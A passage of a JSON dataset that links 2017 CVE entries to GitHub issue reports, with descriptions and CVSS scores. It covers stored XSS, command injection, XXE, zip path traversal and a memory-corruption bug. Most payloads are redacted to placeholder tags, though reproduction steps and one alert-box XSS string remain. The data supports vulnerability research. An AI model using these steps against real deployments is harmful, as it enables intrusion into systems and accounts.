        "description": "Multiple XSS. There are multiple XSS in markdown notes you can trigger them with following payloads CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000461",
        "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/11683",
        "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/11683",
        "Repo_new": "brave/browser-laptop",
        "Issue_Created_At": "2017-10-26T17:26:03Z",
        "description": "Fingerprinting protections bypassable. Description Many of the current fingerprinting protections rely on removing references to methods from the global object. However, you can get alternate references to the same methods by inserting a configured iframe element and grabbing the references off APITAG or APITAG . Steps to Reproduce CODETAG Actual result: You can get references to the fingerprinting related methods. Expected result: You shouldn't be able to get to these methods. Reproduces how often NUMBERTAG Brave Version All versions Reproducible on current live release: Yes",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000462",
        "Issue_Url_old": "https://github.com/BookStackApp/BookStack/issues/575",
        "Issue_Url_new": "https://github.com/bookstackapp/bookstack/issues/575",
        "Repo_new": "bookstackapp/bookstack",
        "Issue_Created_At": "2017-10-26T19:52:01Z",
        "description": "Stored Cross Site Scripting. For Bug Reports APITAG Version APITAG in settings, Please don't put 'latest') : APITAG NUMBERTAG PHP Version NUMBERTAG APITAG Version: Ver NUMBERTAG Distrib NUMBERTAG for Linu NUMBERTAG Expected Behavior Filter out JS code. Any author can write Cross site scripting payloads and cause issues for the users/ Current Behavior JS code is not filtered within the page creation Steps to Reproduce NUMBERTAG Create a book NUMBERTAG Create a page NUMBERTAG While editing the page, choose to edit the source code and add APITAG NUMBERTAG isit the page (alert box should pop up)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000463",
        "Issue_Url_old": "https://github.com/Leafpub/leafpub/issues/125",
        "Issue_Url_new": "https://github.com/leafpub/leafpub/issues/125",
        "Repo_new": "leafpub/leafpub",
        "Issue_Created_At": "2017-10-28T10:56:29Z",
        "description": "Stored Cross site Scripting (XSS). Issue Summary Stored Cross site Scripting (XSS) in page editor causing any author to get arbitrary javascript execution on the any viewer's browser. Steps to Reproduce Tell us how to replicate the problem NUMBERTAG Log in to a user with writer permissions NUMBERTAG Choose to edit a blog post NUMBERTAG Choose to embed a resource. A side panel will appear asking you for code NUMBERTAG Enter the following payload in the side panel: APITAG , and save the blog NUMBERTAG iew the blog and observe an alert box pop up. Additional info Leafpub version NUMBERTAG PHP version NUMBERTAG Affected browsers: All that can run javascript Operating system: Ubuntu",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000465",
        "Issue_Url_old": "https://github.com/sulu/sulu-standard/issues/835",
        "Issue_Url_new": "https://github.com/sulu/sulu-standard/issues/835",
        "Repo_new": "sulu/sulu-standard",
        "Issue_Created_At": "2017-10-29T02:54:23Z",
        "description": "Stored Cross site Scripting (XSS) in page creation. | Q | A | | | Bug? | Yes | New Feature? | no | Sulu Version NUMBERTAG Browser Version | Chrome Actual Behavior Sulu saves the code unsanitised and allows arbitrary execution of javascript. Expected Behavior Sulu should remove the javascript payload as it does for most others. Steps to Reproduce NUMBERTAG Log in as a user with page editing permissions NUMBERTAG Choose to edit an article NUMBERTAG Add a new block with type text NUMBERTAG Click the source code button on the editor and enter the following code: APITAG NUMBERTAG Save the code Possible Solutions Check iframe src prior to adding to the page.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000466",
        "Issue_Url_old": "https://github.com/invoiceninja/invoiceninja/issues/1727",
        "Issue_Url_new": "https://github.com/invoiceninja/invoiceninja/issues/1727",
        "Repo_new": "invoiceninja/invoiceninja",
        "Issue_Created_At": "2017-10-30T00:07:46Z",
        "description": "Stored Cross site Scripting in Client's Name. Issue Anyone with the permission to change a client's name can use that parameter to gain arbitrary execution of javascript. Anyone who can create an invoice will be affected by this payload. Steps to reproduce NUMBERTAG Create a client NUMBERTAG Change the client's name, first name, and last name to the following payload: APITAG NUMBERTAG Go to create an invoice NUMBERTAG Select that client. Observe an alert box has popped up.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000467",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/209",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/209",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2017-10-30T03:32:47Z",
        "description": "Stored Cross site Scripting (XSS). Issue Stored XSS found within the blog creation page. This allows attackers to get arbitrary execution of javascript code. Steps to reproduce NUMBERTAG Log into a user's account with blog writing permissions (like role user in the demo website NUMBERTAG Go to the blogs page NUMBERTAG Create a blog page, with the contents of the page as follows: ERRORTAG Please ensure this payload is entered using the source code view of the blog editor",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000469",
        "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1845",
        "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1845",
        "Repo_new": "cobbler/cobbler",
        "Issue_Created_At": "2017-10-19T08:15:37Z",
        "description": "The Repos feature is vulnerable to commands injection attack. In the Repos feature, Cobbler does not sanitize its user input; as a result, it is possible to execute arbitrary commands by specifying a malformed repository mirror during its creation or edition. As the service runs as root, it is thus possible to leak sensitive information and gain remote root access on the machine that runs Cobbler. Sample of a malicious input, entered in the Mirror field in the Adding a Repo form: APITAG Then a Reposync action has to be executed to trigger the malicious command to run. Its output can be seen in the log of the action, which is in the Events page. To fix this issue, we would suggest to filter the user input to remove none valid path characters. Additionally, it would be advisable to run rsync command, if not the entire service, as an unprivileged user. This issue has been verified on versions up to NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000472",
        "Issue_Url_old": "https://github.com/pocoproject/poco/issues/1968",
        "Issue_Url_new": "https://github.com/pocoproject/poco/issues/1968",
        "Repo_new": "pocoproject/poco",
        "Issue_Created_At": "2017-11-01T17:43:53Z",
        "description": "Zip Decompress Parent Path Injection. By manipulation of the Zip input file header, the contents of the zip archive can be written to an arbitrary parent path of the user. Expected behavior Throw an exception if filename contains a parent directory reference. APITAG APITAG should check if the filename contains a tilde character. Actual behavior By inserting a tilde slash (~/) in the filename area of the zip header, files can be written to the user's home directory. Steps to reproduce the problem Use the sample unzip samle application as follows: ERRORTAG _ FILETAG _ contains a file _foo_. _foo_ includes the string _bar_ vuln.zip hexdump: CODETAG After executing the program, a file _o_ with the content _bar_ is written in the home of the user. APITAG (_o_ is just an example name) POCO version APITAG Compiler and version clang version NUMBERTAG PATHTAG ) Operating system and version NUMBERTAG APITAG NUMBERTAG SMP Mon Oct NUMBERTAG UTC NUMBERTAG APITAG Security implications Due to the current behavior of the Zip Decompress mechanism it is possible to write files in parent arbitrary user directories. For example, a manipulated _.bashrc_ could be inserted into the user's home. Cheers Stephan Zeisberg",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000473",
        "Issue_Url_old": "https://github.com/afaqurk/linux-dash/issues/447",
        "Issue_Url_new": "https://github.com/tariqbuilds/linux-dash/issues/447",
        "Repo_new": "tariqbuilds/linux-dash",
        "Issue_Created_At": "2017-11-09T07:21:04Z",
        "description": "Command injection vulnerabilities. There are multiple command injection vulnerabilities in the current version linux dash NUMBERTAG The python and node versions of the servers are vulnerable to code injection. For example, with the python server running on my local host, navigating to the URL URLTAG will output the listing of the current directory. FILETAG In the case of the node version, by using a node client commands can be executed directly. For example: FILETAG At this point, it is pretty trivial to gain a shell on the server. And since the readme mentions that it may require sudo, there's a good chance that shell will be a root shell NUMBERTAG In FILETAG , the final two lines of the script are as follows: APITAG Since all the various versions of the servers (go, node, php, and python) all simply pass an argument to this shell script, some limited command injection is possible. For example, any linux commands that do not need an argument. For example, when running the python version of the server on my localhost the URL URLTAG will return: FILETAG Depending on the permissions of the user running the server, it may be possible to do things like APITAG the system by shutting it down.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000476",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/867",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/867",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-11-17T03:36:06Z",
        "description": "CPU exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG when debug found dds_info >mipmapcount is very large CODETAG testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000477",
        "Issue_Url_old": "https://github.com/pravednik/xmlBundle/issues/2",
        "Issue_Url_new": "https://github.com/pravednik/xmlbundle/issues/2",
        "Repo_new": "pravednik/xmlbundle",
        "Issue_Created_At": "2017-11-20T11:16:58Z",
        "description": "XXE APITAG Security Vulnerability. APITAG APITAG is vulnerable to an XXE APITAG vulnerability. The code with the APITAG is given below: ERRORTAG This can be used to create very large strings, which can eventually APITAG the system. Due to the working of APITAG , we cannot run system commands using the package (tested with my limited knowledge though). However, entities can be used easily. Hope this helps!",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000478",
        "Issue_Url_old": "https://github.com/elabftw/elabftw/issues/531",
        "Issue_Url_new": "https://github.com/elabftw/elabftw/issues/531",
        "Repo_new": "elabftw/elabftw",
        "Issue_Created_At": "2017-11-20T11:48:14Z",
        "description": "Stored Cross site Scripting Bypassing APITAG Editor. Description of the problem Anyone who can edit an experiment can gain arbitrary execution of APITAG stored within an experiment. All you have to do is use a web interception proxy, like Burp Suite, and intercept the saving of an experiment. Edit the infos section of the experiment and add in ERRORTAG . An alert box will show up, which proves the arbitrary execution of APITAG code. Information Elabftw version (visible in Sysadmin panel NUMBERTAG Installation method (git, docker or zip archive) : git Operating system + version : Ubuntu NUMBERTAG Browser used (firefox/chrome) : firefox For git/zip installation method: PHP version NUMBERTAG APITAG version NUMBERTAG Webserver (apache/nginx) + version : Apache NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000485",
        "Issue_Url_old": "https://github.com/nylas-mail-lives/nylas-mail/issues/181",
        "Issue_Url_new": "https://github.com/nylas-mail-lives/nylas-mail/issues/181",
        "Repo_new": "nylas-mail-lives/nylas-mail",
        "Issue_Created_At": "2017-11-29T05:14:40Z",
        "description": "Set more restrictive permssion on .nylas mail. On APITAG by default the APITAG directory has NUMBERTAG permission, so other users can use APITAG and APITAG to retrieve my credentials. A CVE was assigned for a similar vulnerability URLTAG in Telegram Desktop, should I request a CVE for this issue?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000486",
        "Issue_Url_old": "https://github.com/primefaces/primefaces/issues/1152",
        "Issue_Url_new": "https://github.com/primefaces/primefaces/issues/1152",
        "Repo_new": "primefaces/primefaces",
        "Issue_Created_At": "2016-02-15T18:16:21Z",
        "description": "EL Injection in Primefaces NUMBERTAG As already shared privately last year PATHTAG is to vulnerable to remote exploitable code execution through EL Injection You can find more information here: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000491",
        "Issue_Url_old": "https://github.com/rhysd/Shiba/issues/42",
        "Issue_Url_new": "https://github.com/rhysd/shiba/issues/42",
        "Repo_new": "rhysd/shiba",
        "Issue_Created_At": "2017-11-25T19:07:19Z",
        "description": "XSS to RCE vulnerability report. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working POC that I dont want to post publicly. Please contact me at EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000492",
        "Issue_Url_old": "https://github.com/leanote/leanote/issues/695",
        "Issue_Url_new": "https://github.com/leanote/leanote/issues/695",
        "Repo_new": "leanote/leanote",
        "Issue_Created_At": "2017-11-28T10:06:48Z",
        "description": "XSS to code execution. This issue should not be closed before being fixed. Also I have made a request on full disclosure on the issue. URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000494",
        "Issue_Url_old": "https://github.com/miniupnp/miniupnp/issues/268",
        "Issue_Url_new": "https://github.com/miniupnp/miniupnp/issues/268",
        "Repo_new": "miniupnp/miniupnp",
        "Issue_Created_At": "2017-12-09T16:08:00Z",
        "description": "Heap buffer overflow in parseelt (minixml.c) and SIGSEGV in APITAG (upnpreplyparse.c). Dear miniupnpd team \u2014 I have detected a heap buffer overflow in parseelt (minixml.c) and a memory corruption (invalid read, SIGSEGV) in APITAG (upnpreplyparse.c). while handling two consecutive malformed SOAP Request. Version APITAG How to reproduce the NUMBERTAG issues NUMBERTAG Compile miniupnpd with clang and add the following flags for detecting the memory corruption (optional valgrind can also detect the overflow) APITAG NUMBERTAG Start miniupnpd APITAG NUMBERTAG Use _netcat_ to trigger the heap buffer overflow CODETAG NUMBERTAG Use _netcat_ to trigger the consecutive SIGSEGV CODETAG ASAN output (heap buffer overflow) ERRORTAG ASAN output (SIGSEGV) ERRORTAG Valgrind output (heap buffer overflow + SIGSEGV if compiled without the flags from NUMBERTAG ERRORTAG I found the two issues with AFL. Best Stephan Zeisberg",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000495",
        "Issue_Url_old": "https://github.com/quickapps/cms/issues/183",
        "Issue_Url_new": "https://github.com/quickapps/cms/issues/183",
        "Repo_new": "quickapps/cms",
        "Issue_Created_At": "2017-12-11T10:28:01Z",
        "description": "Stored Cross Site Scripting (XSS). Issue Any user can execute APITAG code on an administrator user's account by simply changing their name into an XSS payload. This can be used to create a denial of service condition, or make the administrator perform unauthorised actions. Steps to reproduce NUMBERTAG Create a user with the lowest privileges NUMBERTAG Navigate to the 'My Account' section of the application NUMBERTAG Change the user's real name to a APITAG payload, like ERRORTAG NUMBERTAG Log out of the account NUMBERTAG Log into an administrator account NUMBERTAG Navigate to the user list in the administrator's console NUMBERTAG Observe an alert box appear",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000496",
        "Issue_Url_old": "https://github.com/commsy/commsy/issues/2",
        "Issue_Url_new": "https://github.com/commsy/commsy/issues/2",
        "Repo_new": "commsy/commsy",
        "Issue_Created_At": "2017-12-13T03:41:04Z",
        "description": "XXE APITAG in configuration import. Issue An appropriately placed attacker can upload a ZIP file with XML files within it. If these XML files contain the payload from billion laughs attack ( URLTAG a denial of service scenario can be created. Remediation Before loading the XML into memory, use APITAG to ensure no entities can affect your import",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000497",
        "Issue_Url_old": "https://github.com/sbrl/Pepperminty-Wiki/issues/152",
        "Issue_Url_new": "https://github.com/sbrl/pepperminty-wiki/issues/152",
        "Repo_new": "sbrl/pepperminty-wiki",
        "Issue_Created_At": "2017-12-13T03:56:34Z",
        "description": "XXE APITAG in getsvgsize. Issue Pepperminty Wiki is vulnerable to XXE attacks due to the usage of the APITAG function without disabling entities. This leads to a confirmed denial of service scenario ( URLTAG and may lead to execution of commands on the server. Where the Issue Occurred If an uploaded svg, containing the billion laughs payload, makes its way to the simplexml_load_file function, the denial of service scenario is triggered. This exact locations in the code are given below: URLTAG URLTAG Remediation Prior to loading any xml, disable entities ensuring that the above mentioned attacks will no longer be possible. APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-1000498",
        "Issue_Url_old": "https://github.com/BigBadaboom/androidsvg/issues/122",
        "Issue_Url_new": "https://github.com/bigbadaboom/androidsvg/issues/122",
        "Repo_new": "bigbadaboom/androidsvg",
        "Issue_Created_At": "2017-12-13T05:33:19Z",
        "description": "XXE APITAG within SVG Parsing. Issue androidsvg is vulnerable to XXE attacks as some dangerous features are not disabled. This leads to a confirmed denial of service scenario ( URLTAG and may lead to execution of commands on the server. This issue occurs in the SVG parse section of the code: URLTAG Prior to parsing the XML, features like entities are not disabled. These should not be required at all within an SVG file. Remediation Implementing something down the lines of the following: CODETAG This ensures that the entities are no longer parsed and external dtd files are not either.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-1000506",
        "Issue_Url_old": "https://github.com/mautic/mautic/issues/5222",
        "Issue_Url_new": "https://github.com/mautic/mautic/issues/5222",
        "Repo_new": "mautic/mautic",
        "Issue_Created_At": "2017-10-27T00:49:18Z",
        "description": "Stored XSS in Company Name. What type of report is this: | Q | A | | | Bug report? | \u2713 | Feature request? | | Enhancement? | Description: Stored Cross site scripting in the Company's name. This allows a person to gain arbitrary execution of JS code on anyone who views the Company's name within their browser. If a bug: | Q | A | | | Mautic version NUMBERTAG PHP version NUMBERTAG Steps to reproduce NUMBERTAG Create a new company NUMBERTAG Set the company name to ERRORTAG NUMBERTAG Navigate to a place where the company name is reflected and observe an alert box pop up Log errors: APITAG check for related errors in the latest log file in [mautic PATHTAG and/or the web server's logs and post them here. Be sure to remove sensitive information if applicable._ None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1000507",
        "Issue_Url_old": "https://github.com/cnvs/canvas/issues/359",
        "Issue_Url_new": "https://github.com/austintoddj/canvas/issues/359",
        "Repo_new": "austintoddj/canvas",
        "Issue_Created_At": "2017-10-27T02:52:28Z",
        "description": "Stored XSS Vulnerability. Description An attacker can arbitrarily execute JS code in another user's browser. Steps to reproduce NUMBERTAG Log in with a valid user NUMBERTAG Change the user's display name to ERRORTAG NUMBERTAG Log out of the account NUMBERTAG Log into an admin user NUMBERTAG Navigate to the user page (listing all users). Notice an alert box pops up showing execution of JS Remediation When printing this variable out, simply HTML encode it.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000509",
        "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/7727",
        "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/7727",
        "Repo_new": "dolibarr/dolibarr",
        "Issue_Created_At": "2017-10-27T22:01:56Z",
        "description": "Stored Cross site scripting (XSS) in product page. Bug Stored Cross site scripting (XSS) using product page, bypassing XSS detection Environment Version NUMBERTAG OS : Ubuntu Web server : Apache PHP NUMBERTAG Database : APITAG URL(s) : APITAG Expected and actual behavior Expected behaviour XSS detector picks up on the payload and refuses to save it Actual behaviour XSS payload is saved with no interference from the detector. When visiting the page later, the payload executes. Steps to reproduce the behavior NUMBERTAG Log into Dolibarr with a user who can edit the name of a product NUMBERTAG Choose a product (this products name will be changed FYI), and click on the modify details button NUMBERTAG Append the following payload to the product's current name: APITAG Suggested implementation Change the detector to now pick up on similar payloads (including this one)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1000510",
        "Issue_Url_old": "https://github.com/croogo/croogo/issues/847",
        "Issue_Url_new": "https://github.com/croogo/croogo/issues/847",
        "Repo_new": "croogo/croogo",
        "Issue_Created_At": "2017-10-28T08:15:05Z",
        "description": "Stored Cross site Scripting (XSS). Summary Stored Cross site Scripting (XSS) in page name allowing a user to get arbitrary JS execution. This isn't really a big issue as the website already has all session tokens using APITAG and you need to be an administrator (if using as the default) to post. It is quite reasonable for organisations to make other roles for contributors/authors, hence being worth the patch. I'm not too sure if this is still an issue in NUMBERTAG as I couldn't get the server set up for it yet. System information Croogo version NUMBERTAG g6f NUMBERTAG e6c Web server: apache2 APITAG Ubuntu NUMBERTAG Steps to reproduce NUMBERTAG Log into the website NUMBERTAG Create a new page NUMBERTAG Set the page's name to ERRORTAG NUMBERTAG isit the page list section of the admin panel and observe an alert box pop up. Expected behavior ERRORTAG is HTML Encoded Actual behavior JS code is arbitrarily executed",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1001001",
        "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/253",
        "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/253",
        "Repo_new": "pluxml/pluxml",
        "Issue_Created_At": "2017-09-22T05:54:56Z",
        "description": "Stored XSS within article creation. A writer or the administrator can write javascript within the page, which can then be used to steal other user's session tokens (actually quite possible as the session token doesn't have APITAG enabled). Adding something like APITAG , in the article's content stores the payload on the server. Then any user who visits the page is affected by the payload. I would advise HTML encoding the user input and also setting the APITAG flag on the session token.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2017-1002100",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/47611",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/47611",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2017-06-15T18:59:13Z",
        "description": "Azure PV should be Private scope not Container scope.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-1002101",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/60813",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/60813",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2018-03-05T20:53:58Z",
        "description": "APITAG . <content tbd>",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 5.8,
        "exploitabilityScore": 3.1
    },
    {
        "CVE_ID": "CVE-2017-1002102",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/60814",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/60814",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2018-03-05T20:55:20Z",
        "description": "APITAG . <content tbd>",
        "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.6,
        "impactScore": 4.0,
        "exploitabilityScore": 1.1
    },
    {
        "CVE_ID": "CVE-2017-1002152",
        "Issue_Url_old": "https://github.com/fedora-infra/bodhi/issues/1740",
        "Issue_Url_new": "https://github.com/fedora-infra/bodhi/issues/1740",
        "Repo_new": "fedora-infra/bodhi",
        "Issue_Created_At": "2017-08-10T15:53:09Z",
        "description": "CVETAG : APITAG injection via Bugzilla ticket subjects. Marcel reported CVETAG that it is possible to inject APITAG into Bodhi's web interface through Bugzilla ticket subjects. The reporter cited an update URLTAG that did not properly escape tags from the bug it was associated with. We should run the bugzilla text through bleach, similar to what we do for comments from our users.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10667",
        "Issue_Url_old": "https://github.com/zhonghaozhao/zencart/issues/1",
        "Issue_Url_new": "https://github.com/zhonghaozhao/zencart/issues/1",
        "Repo_new": "zhonghaozhao/zencart",
        "Issue_Created_At": "2017-06-24T04:30:35Z",
        "description": "zencart. XSS URLTAG FILETAG URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10667",
        "Issue_Url_old": "https://github.com/zencart/zencart/issues/1443",
        "Issue_Url_new": "https://github.com/zencart/zencart/issues/1443",
        "Repo_new": "zencart/zencart",
        "Issue_Created_At": "2017-06-24T03:36:00Z",
        "description": "XSS. URLTAG FILETAG URLTAG FILETAG affect NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10673",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1234",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1234",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2017-06-28T02:37:37Z",
        "description": "admin/profile.php At xss. Display Name: where there is xss payload: \"> APITAG alert(/xss/) APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-10678",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/721",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/721",
        "Repo_new": "piwigo/piwigo",
